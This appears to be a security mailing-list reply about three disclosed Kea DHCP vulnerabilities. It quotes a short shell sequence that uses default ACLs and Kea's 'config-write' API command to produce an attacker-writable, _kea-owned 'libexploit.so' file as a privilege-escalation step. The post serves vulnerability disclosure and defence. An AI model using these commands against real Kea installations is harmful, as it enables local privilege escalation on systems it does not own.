Re: ISC has disclosed three vulnerabilities in Kea (CVE-2025-32801, CVE-2025-32802, CVE-2025-32803)

[Matthias Gerstner <mgerstner () suse de>]

Hi,

On Wed, May 28, 2025 at 08:23:25PM +0200, Jakub Wilk wrote:
> * Matthias Gerstner <mgerstner () suse de>, 2025-05-28 19:21:
> > By leveraging issue 3.2), the Kea services can be instructed to create 
> > `_kea` owned files in the attacker's `$HOME/.Private`. The content of 
> > the created files is not fully attacker controlled, however, so it will 
> > not be possible to craft a valid ELF object for loading via `dlopen()` 
> > this way. By placing a setgid-directory in `$HOME/.Private/evil-dir`, 
> > any files created in this directory will even have the group-ownership 
> > of the attacker. The file mode will be 0644, however,
>
> Default ACLs to the rescue!
>
> $ chmod a+x ~
> $ mkdir -m 777 ~/.Private
> $ setfacl -d -m u:$LOGNAME:rwx ~/.Private/
> $ curl -s -H "Content-Type: application/json" -d '{ "command": "config-write", "arguments": { "filename": 
> "'"$HOME"'/.Private/libexploit.so" } }' localhost:8000 > /dev/null
> $ echo pwned > ~/.Private/libexploit.so
> $ ls -l ~/.Private/libexploit.so
> -rw-rw-rw-+ 1 _kea _kea 6 May 28 18:15 /home/jwilk/.Private/libexploit.so
> $ cat ~/.Private/libexploit.so
> pwned

very nice addition! We already felt like there was little left to
succeed in the attack, but didn't think of ACLs.

We will make an update to our blog post to reflect this.

Cheers

Matthias

Attachment: signature.asc
Description: